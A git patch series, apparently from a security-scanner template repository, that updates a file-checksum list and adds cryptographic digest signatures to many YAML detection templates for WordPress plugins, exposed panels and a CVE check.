http/vulnerabilities/wordpress/wp-slideshow-xss.yaml:6fb65fc9f05f3c3533e60bb2fefea8f6614402b4 -http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml:6c308e55d5505e420ea6b1b43fb6337b64e0c150 +http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml:67204018d7e0670bcedb7064cc67a4bdf2294432 http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml:f8d36766875a74b5fb4d6f5bd7d1b08bf77e57b4 http/vulnerabilities/wordpress/wp-socialfit-xss.yaml:daf38a1b0feff473061c164faf94222d82e622aa http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:1ba6d305a15be605674cbbc799bd7e9160823a87 -http/vulnerabilities/wordpress/wp-statistics-sqli.yaml:1551e1ceee3902beb8bdc585e63d9726f0f200bb +http/vulnerabilities/wordpress/wp-statistics-sqli.yaml:388ff4fc773105e1416b05eaf4c23a51d749fa1d http/vulnerabilities/wordpress/wp-super-forms.yaml:e828dbd896c649b82e4c7b47c312a852d3024309 http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml:a9aa87ed62f963d5c50d611eacc4c3ba6b406291 http/vulnerabilities/wordpress/wp-sym404.yaml:dfa5f8ceb7bef5d346cfcd895f7920c2e74aa5c8 @@ -9211,7 +9211,7 @@ http/vulnerabilities/wordpress/wpml-xss.yaml:d0ca0c753a79a709be8211e4067d2f138dd http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:956ed2bff326b383bb1075747e748c05d8ea04b0 http/vulnerabilities/wordpress/wptouch-open-redirect.yaml:b59ed3d277d1576e346dea3be780d5a9f61e69fd http/vulnerabilities/wordpress/wptouch-xss.yaml:765636b388d357b4dfcdbd892caf9d8cf860477e -http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml:5d60c82fd9208f974af36d7d1d7a235cda539207 +http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml:d689c110e4a075a89cb40c6af8284cfef088e7a9 http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml:ddf3c302df50ac65f4d5f475ca0ac0ca551db020 http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml:5507ebe2acdcbd60480ea935bf202d22efeb6aa8 http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml:1141a0031e1903ac5f68ddce21568f23f8706afa @@ -9235,8 +9235,8 @@ http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml:c08433834e3ea55effae1558d039e7a226024984 http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:863c7dc541872dcf963d4224201ce604030d618f http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 -http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:0930098b37e392d1cf4cdb778b74bba6a2376e3e -http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml:9b8432d7623ccede4cf5d80aa97b9bbde0592535 +http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:3ec0448657f9c8f51541be866f24f38363f39352 +http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml:9e534ddc0c45f5efa8d3bb751278b386e9e5f8e2 http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml:14209e5c61ea0c9190f3a72fae0b459365274308 http/vulnerabilities/zend/zend-v1-xss.yaml:97c8abd502a622ce52508e13bd13d9ecbccbbd09 http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:aeb3591b7d975001b6ac134aafc0a5638821b1b7 @@ -9495,7 +9495,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b92700dca05e571a85de8dc13b1ba12de72af255 +templates-checksum.txt:7a87b35f4700913b6e89010cab0e25696c79c9a9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 617d25426fa2ffd88c29bf38eda1ea39db6eddc8 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:01:27 +0000 Subject: [PATCH 213/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-46310.yaml | 2 ++ http/default-logins/zebra/zebra-printer-default-login.yaml | 2 ++ http/exposed-panels/sqlpad-panel.yaml | 2 ++ http/exposed-panels/usermin-panel.yaml | 2 ++ http/technologies/wordpress/plugins/ad-inserter.yaml | 3 +-- http/technologies/wordpress/plugins/add-to-any.yaml | 3 +-- http/technologies/wordpress/plugins/admin-menu-editor.yaml | 3 +-- .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 3 +-- http/technologies/wordpress/plugins/akismet.yaml | 3 +-- http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-migration.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 3 +-- http/technologies/wordpress/plugins/amp.yaml | 3 +-- http/technologies/wordpress/plugins/antispam-bee.yaml | 3 +-- http/technologies/wordpress/plugins/astra-sites.yaml | 3 +-- http/technologies/wordpress/plugins/autoptimize.yaml | 3 +-- http/technologies/wordpress/plugins/backwpup.yaml | 3 +-- http/technologies/wordpress/plugins/better-search-replace.yaml | 3 +-- http/technologies/wordpress/plugins/better-wp-security.yaml | 3 +-- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 3 +-- http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 3 +-- http/technologies/wordpress/plugins/breeze.yaml | 3 +-- http/technologies/wordpress/plugins/broken-link-checker.yaml | 3 +-- http/technologies/wordpress/plugins/chaty.yaml | 3 +-- .../wordpress/plugins/child-theme-configurator.yaml | 3 +-- http/technologies/wordpress/plugins/classic-editor.yaml | 3 +-- http/technologies/wordpress/plugins/classic-widgets.yaml | 3 +-- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 3 +-- http/technologies/wordpress/plugins/cmb2.yaml | 3 +-- http/technologies/wordpress/plugins/coblocks.yaml | 3 +-- http/technologies/wordpress/plugins/code-snippets.yaml | 3 +-- http/technologies/wordpress/plugins/coming-soon.yaml | 3 +-- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 3 +-- .../wordpress/plugins/contact-form-7-honeypot.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-7.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-law-info.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-notice.yaml | 3 +-- http/technologies/wordpress/plugins/copy-delete-posts.yaml | 3 +-- http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 3 +-- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 3 +-- http/technologies/wordpress/plugins/custom-css-js.yaml | 3 +-- http/technologies/wordpress/plugins/custom-fonts.yaml | 3 +-- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 3 +-- http/technologies/wordpress/plugins/disable-comments.yaml | 3 +-- http/technologies/wordpress/plugins/disable-gutenberg.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-page.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-post.yaml | 3 +-- http/technologies/wordpress/plugins/duplicator.yaml | 3 +-- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 3 +-- .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 3 +-- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/elementor.yaml | 3 +-- http/technologies/wordpress/plugins/elementskit-lite.yaml | 3 +-- http/technologies/wordpress/plugins/enable-media-replace.yaml | 3 +-- http/technologies/wordpress/plugins/envato-elements.yaml | 3 +-- .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 3 +-- http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 3 +-- http/technologies/wordpress/plugins/extendify.yaml | 3 +-- .../wordpress/plugins/facebook-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/fast-indexing-api.yaml | 3 +-- http/technologies/wordpress/plugins/flamingo.yaml | 3 +-- http/technologies/wordpress/plugins/fluent-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/fluentform.yaml | 3 +-- http/technologies/wordpress/plugins/font-awesome.yaml | 3 +-- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 3 +-- http/technologies/wordpress/plugins/formidable.yaml | 3 +-- http/technologies/wordpress/plugins/forminator.yaml | 3 +-- http/technologies/wordpress/plugins/ga-google-analytics.yaml | 3 +-- .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 3 +-- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 3 +-- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 3 +-- .../wordpress/plugins/google-listings-and-ads.yaml | 3 +-- http/technologies/wordpress/plugins/google-site-kit.yaml | 3 +-- .../wordpress/plugins/google-sitemap-generator.yaml | 3 +-- http/technologies/wordpress/plugins/gtranslate.yaml | 3 +-- http/technologies/wordpress/plugins/gutenberg.yaml | 3 +-- .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 3 +-- .../wordpress/plugins/header-footer-code-manager.yaml | 3 +-- .../wordpress/plugins/header-footer-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/header-footer.yaml | 3 +-- http/technologies/wordpress/plugins/health-check.yaml | 3 +-- http/technologies/wordpress/plugins/hello-dolly.yaml | 3 +-- http/technologies/wordpress/plugins/host-webfonts-local.yaml | 3 +-- http/technologies/wordpress/plugins/hostinger.yaml | 3 +-- http/technologies/wordpress/plugins/image-optimization.yaml | 3 +-- http/technologies/wordpress/plugins/imagify.yaml | 3 +-- .../wordpress/plugins/insert-headers-and-footers.yaml | 3 +-- http/technologies/wordpress/plugins/instagram-feed.yaml | 3 +-- .../wordpress/plugins/intuitive-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack-boost.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack.yaml | 3 +-- http/technologies/wordpress/plugins/kadence-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/kirki.yaml | 3 +-- http/technologies/wordpress/plugins/leadin.yaml | 3 +-- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 3 +-- http/technologies/wordpress/plugins/limit-login-attempts.yaml | 3 +-- http/technologies/wordpress/plugins/litespeed-cache.yaml | 3 +-- http/technologies/wordpress/plugins/loco-translate.yaml | 3 +-- http/technologies/wordpress/plugins/loginizer.yaml | 3 +-- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 3 +-- http/technologies/wordpress/plugins/mailpoet.yaml | 3 +-- http/technologies/wordpress/plugins/maintenance.yaml | 3 +-- http/technologies/wordpress/plugins/mainwp-child.yaml | 3 +-- http/technologies/wordpress/plugins/malcare-security.yaml | 3 +-- http/technologies/wordpress/plugins/megamenu.yaml | 3 +-- http/technologies/wordpress/plugins/members.yaml | 3 +-- http/technologies/wordpress/plugins/meta-box.yaml | 3 +-- http/technologies/wordpress/plugins/metform.yaml | 3 +-- http/technologies/wordpress/plugins/ml-slider.yaml | 3 +-- http/technologies/wordpress/plugins/newsletter.yaml | 3 +-- .../wordpress/plugins/nextend-facebook-connect.yaml | 3 +-- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 3 +-- http/technologies/wordpress/plugins/ninja-forms.yaml | 3 +-- http/technologies/wordpress/plugins/ocean-extra.yaml | 3 +-- .../wordpress/plugins/official-facebook-pixel.yaml | 3 +-- http/technologies/wordpress/plugins/one-click-demo-import.yaml | 3 +-- http/technologies/wordpress/plugins/optinmonster.yaml | 3 +-- http/technologies/wordpress/plugins/otter-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/password-protected.yaml | 3 +-- http/technologies/wordpress/plugins/pdf-embedder.yaml | 3 +-- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/pixelyoursite.yaml | 3 +-- http/technologies/wordpress/plugins/polylang.yaml | 3 +-- http/technologies/wordpress/plugins/popup-maker.yaml | 3 +-- http/technologies/wordpress/plugins/post-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/pretty-link.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-captcha.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-ssl.yaml | 3 +-- http/technologies/wordpress/plugins/redirection.yaml | 3 +-- http/technologies/wordpress/plugins/redux-framework.yaml | 3 +-- http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 3 +-- .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 3 +-- http/technologies/wordpress/plugins/safe-svg.yaml | 3 +-- http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 3 +-- http/technologies/wordpress/plugins/sg-cachepress.yaml | 3 +-- http/technologies/wordpress/plugins/sg-security.yaml | 3 +-- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 3 +-- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 3 +-- .../wordpress/plugins/simple-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/simple-history.yaml | 3 +-- http/technologies/wordpress/plugins/siteguard.yaml | 3 +-- http/technologies/wordpress/plugins/siteorigin-panels.yaml | 3 +-- http/technologies/wordpress/plugins/smart-slider-3.yaml | 3 +-- http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 3 +-- .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 3 +-- .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 3 +-- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 3 +-- http/technologies/wordpress/plugins/svg-support.yaml | 3 +-- http/technologies/wordpress/plugins/tablepress.yaml | 3 +-- http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 3 +-- http/technologies/wordpress/plugins/templately.yaml | 3 +-- http/technologies/wordpress/plugins/the-events-calendar.yaml | 3 +-- http/technologies/wordpress/plugins/tinymce-advanced.yaml | 3 +-- .../wordpress/plugins/translatepress-multilingual.yaml | 3 +-- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 3 +-- .../wordpress/plugins/under-construction-page.yaml | 3 +-- http/technologies/wordpress/plugins/updraftplus.yaml | 3 +-- http/technologies/wordpress/plugins/user-role-editor.yaml | 3 +-- http/technologies/wordpress/plugins/w3-total-cache.yaml | 3 +-- .../wordpress/plugins/webp-converter-for-media.yaml | 3 +-- http/technologies/wordpress/plugins/webp-express.yaml | 3 +-- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 3 +-- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 3 +-- .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 3 +-- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 3 +-- .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-payments.yaml | 3 +-- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 +-- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-services.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/wordfence.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-importer.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-seo.yaml | 3 +-- http/technologies/wordpress/plugins/worker.yaml | 3 +-- http/technologies/wordpress/plugins/wp-crontrol.yaml | 3 +-- http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wp-file-manager.yaml | 3 +-- http/technologies/wordpress/plugins/wp-google-maps.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-logging.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 3 +-- http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 3 +-- http/technologies/wordpress/plugins/wp-optimize.yaml | 3 +-- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 3 +-- http/technologies/wordpress/plugins/wp-reset.yaml | 3 +-- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 3 +-- http/technologies/wordpress/plugins/wp-rollback.yaml | 3 +-- http/technologies/wordpress/plugins/wp-seopress.yaml | 3 +-- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 3 +-- http/technologies/wordpress/plugins/wp-smushit.yaml | 3 +-- http/technologies/wordpress/plugins/wp-statistics.yaml | 3 +-- http/technologies/wordpress/plugins/wp-super-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 3 +-- http/technologies/wordpress/plugins/wpforms-lite.yaml | 3 +-- http/technologies/wordpress/plugins/wps-hide-login.yaml | 3 +-- http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 3 +-- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 3 +-- http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml | 3 +-- 204 files changed, 208 insertions(+), 400 deletions(-) diff --git a/http/cves/2024/CVE-2024-46310.yaml b/http/cves/2024/CVE-2024-46310.yaml index 45cd75d041..69c0abb971 100644 --- a/http/cves/2024/CVE-2024-46310.yaml +++ b/http/cves/2024/CVE-2024-46310.yaml @@ -29,3 +29,5 @@ http: - 'contains_all(body,"endpoint", "id", "identifiers", "name", "ping")' - 'status_code == 200' condition: and + +# digest: 4b0a00483046022100f5a6235c824a93a9d49d558d30e480954ec4febaaa60979aea1772ee53e81cd8022100d612f7ada0a3068317f2e50da8a6f2ca202f0a743115cd759447ccbc92b11e7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/zebra/zebra-printer-default-login.yaml b/http/default-logins/zebra/zebra-printer-default-login.yaml index 4257d3dd2e..11fd320651 100644 --- a/http/default-logins/zebra/zebra-printer-default-login.yaml +++ b/http/default-logins/zebra/zebra-printer-default-login.yaml @@ -40,3 +40,5 @@ http: - type: status status: - 200 + +# digest: 490a0046304402202b9ef430e054dd489ab9318f27460b450fdf69b110e9f9399a171a9a664534ad022015fdab235cd7d9c2029bfd40506407906b5ca4dbb721b8b0a3704cfae272cbdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/sqlpad-panel.yaml b/http/exposed-panels/sqlpad-panel.yaml index 903ecab1e5..51cc976f1e 100644 --- a/http/exposed-panels/sqlpad-panel.yaml +++ b/http/exposed-panels/sqlpad-panel.yaml @@ -25,3 +25,5 @@ http: - 'contains_any(body, "SQLPad", "webpackJsonpsqlpad")' - 'status_code == 200' condition: and + +# digest: 4a0a00473045022100bc16a77b7614e4eeb2fbe8d3cb2c32f5c65674b9f3503e0b24ad6ff6dcecb12602203968bdd50fd4caf3debb4a878fdc2b985a68ff3807bc4e06e4ff00008c93b96b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/usermin-panel.yaml b/http/exposed-panels/usermin-panel.yaml index 80c7ac3c5f..ea8f2dcff3 100644 --- a/http/exposed-panels/usermin-panel.yaml +++ b/http/exposed-panels/usermin-panel.yaml @@ -23,3 +23,5 @@ http: - 'contains_all(body, "Login to Usermin", "/manifest-usermin.json")' - 'status_code == 200' condition: and + +# digest: 4b0a004830460221009fbabffea82de347164cf0b879f8c95acb3363c0c269020e3cb5c379d9e2fd6e022100b8202cec338ab087af9997eae27e9825f606d96b843a88f147c7f2d7d955d9fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 5716af7283..7af18f894b 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207eb2a3f4138ed93b2851c64534eb585150fa30d2dd8ea68a6c78d28548a16335022100f340aa18cb5693abce6dc92893c6bc68894d84c1dc7c53bde207519d7d2fb71a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc92887e2fc7623d1f14c6173f138c57ae2a03e5b7a51d288f3c11764471bef602210085ade809ae9be30e574ab27afde8b0e311750d31e822ab5b577b6255dee844bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 618eb0cb5c..9762c4d995 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205fe4363eee98da4af10125b571daf8f5ff25817b704b66a2e4f903dbae0e5ea30220644cda50be86e1c4b27c1872d48ce1505c2de6f284126dd405ec43f3baba0d84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203db844348ddec27dab184a3146d1666d505a7dd0bb1e1b03e49a6e1dda99c7af0220266940d5ea3222926c2fa3260b76268ef6edf76e7788ed1f92c38f99bc809fdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 282cb3376f..f921de3991 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203e6f7f749447ee24de1ffc1633821139092fbf3cefa3b290f8d5235ddaf9ca90022036abeed0c509b56e662bc942822e273a636e77d1eb6db603a04baf48406c971d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5f8622987af376a232d3171270906cfdb56057032e407ef58820561fa5a2d30022021cdf6bfa1aae8093b65611b3ee37985f7df1c53555387790ede2c80dc94797a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index a745215b30..7dcec76422 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100845aeb1492e46c3a6efe8518b808ac9c30bdd19e61c219a061b2c028963250c70221009f702c1fd9c068fb1a0588fd0915296b5ce79ad2f78c25c775d006df94774c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027dfc01a353f1006adc7225a36e65f4c8a933ce5927f062c90d6c3f0406c032d0220028c78e98f18155573e5693e7ec0a534a4895c5382c6c775f0c74e18aa641ec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 8ed7127bdd..910b5ba31a 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f5d837294ecd22ebb74d8b09ae5bbf212f24b1fa6e7b7e7dcad0db89044a9a04022100bacdcb41f854ad0eebd8ce1305e504ffedaceb95ce2ee689d1f693e04a6bbf28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092a7b824a8e92693ec04dfe358ec4519bbe51b338db22a49569417d8996d7ca902207dc1fe8fe6cb1422b18d15160d93bdcff407db403405517d0f80723b15ffe0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index d9ce4a17df..7dda504b7b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022025c6c0208a0e99957c1846cc8403ca4ab464438c510ac6b16009a5e7e12bce9e022007df79a28750810db17c3a97f9234505d9013655174a8c17066111d3a041273f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f1434ddfaa4aed135eb21fe76a80268a17d7eccb0527e62248a0a4951e806fd022035b4ced685fa5b64edeecc10fa33a926e81e3d6d6913e1203255e5b23d2aa149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index f8ce0d935c..9d96170a7d 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220501abeecb08946208fba6a228afe11fba60a955f6367e83a5e28112b1e9d0048022000863ea752b876e6adf4dbe500644861fbeb0793cd7757c757b0d36418c22d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008e8820b0b3bd650024dbf58a1d371bc383c9649127c1b4785b3fdf738a942e78022100a4e7217b5fe674ae26d48816372250702331c2eff57ecc32903d2dd4993d7cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index da20fad247..2ed0f2fc53 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201b82e6c4c223648506dd81495077c77c7e6ba06e035f6515cccec7d0732a180102205f91e01cac2d07e2ace92f6106eda60d76c5ce336c29b5fbaeaa412ba9a8f818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ffecf2ff19b661f4abc1855b7172bd2e9fcbdbca5ce46c62328cbc971213191602202078303d8b5d58a7c060160c7eac79f73ae0149a7048ee161bce916cf9397bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 088edca467..6381bb42fe 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206617a5c7578f33476732808398205c98fe6ce72cc18c2bf084c85bdf6b7d969902200554ff997a9352d74c72d473740fd96f59d14677533762ce43f9230c09516085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c028d34c3ce14899ec6dd979dffb9ab48f8288a03c9143b888a837e6fa9a80102200762b3c10370c9cd3b716071b857f3a9297961ea640442f9e8c86f1c0b0a4217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index c97bca4eff..447c945472 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a15fb994ea26af9051e35a92b2daf47aa383cc8d9d506c14f341be2af308635f0221009a1f31f2a3ad8f44c6801be46a2a2bd353d599b8e5e3f12852a0c34d2e8444fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecb2d921b249799ddde21386b49cf917ca1156f4eee5ce8d380d3ae9c9b4faef022037f74ae8423925cc9a9af1258a4ab1ee255e08c12518d890382d629aa74558c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index e056e2e2bc..d210a846f1 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 